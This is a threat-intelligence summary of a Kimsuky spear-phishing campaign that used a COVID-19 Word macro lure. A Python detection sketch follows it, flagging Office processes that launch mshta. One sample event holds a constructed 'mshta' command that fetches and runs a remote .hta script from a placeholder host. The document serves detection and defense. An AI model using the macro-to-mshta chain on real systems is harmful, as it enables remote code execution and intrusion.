Beware of Smoke Screen APT Attacks by the Kimsuky Group Disguised as COVID-19 Content!

2020-02-28 ESTSecurity Beware of smoke screen APT attacks by the Kimsuky organization disguised as COVID-19 content!

https://blog.alyac.co.kr/2779


ESRC reports a Korean-language COVID-19 lure attributed as likely Kimsuky activity and analyzed as part of the group's SmokeScreen campaign. The spear-phishing targeted an international exchange and diplomacy-related organization with a malicious Word document named “Coronavirus response.doc” that prompted the recipient to enable macros. If enabled, the macro displayed plausible COVID-19 meeting content while using mshta to contact attacker-controlled infrastructure hosted on a domestic service and retrieve additional script content beginning with search.hta. The activity matters because it adapted pandemic anxiety and increased remote-work email exposure into a localized spear-phishing chain aimed at Korean organizations.
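A detection sketch for the chain summarized above (an Office process launching mshta against a remote URL), added here as an example and not taken from the ESRC report. The field names follow Sysmon process-creation events; the list of Office parents, the sample events and the example.test host are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Office binaries whose child processes are worth scrutinising (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_office_mshta(events):
    """Return findings for Office -> mshta.exe launches that reference a remote URL."""
    findings = []
    for ev in events:
        if basename(ev.get("Image", "")) != "mshta.exe":
            continue
        if basename(ev.get("ParentImage", "")) not in OFFICE_PARENTS:
            continue
        for url in URL_RE.findall(ev.get("CommandLine", "")):
            parsed = urlparse(url)
            findings.append({
                "host": parsed.hostname,
                "path": parsed.path,
                "is_hta": parsed.path.lower().endswith(".hta"),
                "parent": basename(ev["ParentImage"]),
            })
    return findings

# Constructed sample events (not from the report); example.test is a placeholder host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://files.example.test/docs/search.hta /f"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for finding in detect_office_mshta(SAMPLE_EVENTS):
        print(finding)
```

A macro that starts mshta indirectly (for example through WMI or a scheduled task) would not show Word as the direct parent, so treat this parent-child check as one signal alongside mshta network connections.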
